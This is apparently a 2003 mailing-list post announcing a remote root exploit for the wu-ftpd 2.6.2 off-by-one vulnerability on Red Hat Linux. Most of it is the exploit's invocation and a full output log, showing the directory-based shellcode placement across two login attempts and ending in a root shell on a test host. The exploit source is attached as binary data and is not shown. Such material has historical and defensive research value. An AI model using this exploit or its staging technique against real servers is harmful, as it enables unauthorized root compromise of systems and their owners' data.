I succeeded in RedHat Linux (x86) wu-2.6.2(1), 2.6.2(2), 2.6.1, 2.6.0. (Most version). This is never fake. Excellent Advisory was already announced (2003/07/31): http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt This information was very useful to me. I'm thankful to them. This works well in my server. If don't work in your server ? Reason that don't work in other server is various kinds. (For example, compiler version, operating system kind, or, shellcode's position mistake, environment variable etc ...) I don't think about those. Exert your force. :-) INetCop Security is poor now. They have a few server. * Exploit result: -- bash$ cat /etc/redhat-release Red Hat Linux release 6.1 (Cartman) bash$ gcc -v Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) -- bash$ ./0x82-wu262 -htest.inetcop.org -ux82 -pmy_pass -n21 -t2 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit. [*] Target: RedHat Linux 6.x Version wu-2.6.2(2) compile. [+] address: 0x806aaf0. [*] #1 Try, test.inetcop.org:21 ... [ OK ] [1] ftpd connection login. [*] ftpd connection success. [+] User id input. [+] User password input. [*] User x82 logged in. [2] send exploit code. [+] 01: make 0x41414141 directory. [+] 02: make shell-code directory. [+] 03: make 0x43434343 directory. [+] 04: make 0x44444444 directory. [+] 05: make 0x45454545 directory. [+] 06: make 0x46464646 directory. [+] 07: make 0x47474747 directory. [+] 08: make 0x48484848 directory. [+] 09: make 0x49494949 directory. [+] 10: make 0x50505050 directory. [+] 11: make 0x51515151 directory. [+] 12: make 0x52525252 directory. [+] 13: make 0x53535353 directory. [+] 14: make 0x54545454 directory. [+] 15: make 0x55555555 directory. [+] Ok, MKD &shellcode_dir. [+] #2 Try, test.inetcop.org:21 ... [ OK ] [3] ftpd connection login. [*] ftpd connection success. [+] User id input. [+] User password input. [*] User x82 logged in. [4] send exploit code. [+] 01: make 0x41414141 directory. [+] 02: make shell-code directory. [+] 03: make 0x43434343 directory. [+] 04: make 0x44444444 directory. [+] 05: make 0x45454545 directory. [+] 06: make 0x46464646 directory. [+] 07: make 0x47474747 directory. [+] 08: make 0x48484848 directory. [+] 09: make 0x49494949 directory. [+] 10: make 0x50505050 directory. [+] 11: make 0x51515151 directory. [+] 12: make 0x52525252 directory. [+] 13: make 0x53535353 directory. [+] 14: make 0x54545454 directory. [+] 15: make 0x55555555 directory. [+] Ok, RMD &shellcode_dir. [5] Waiting, execute the shell ... [*] Send, command packet ! x82 is happy, x82 is happy, x82 is happy Linux test.inetcop.org 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown uid=0(root) gid=0(root) egid=501(x82) groups=501(x82),500(secure) bash# -- P.S: Please, don't give me question about exploit, mail. Sorry, for my poor english. -- _______________________________________________ Get your free email from http://www.hackermail.com Powered by Outblaze
Attachment:
0x82-wu262.c
Description: Binary data
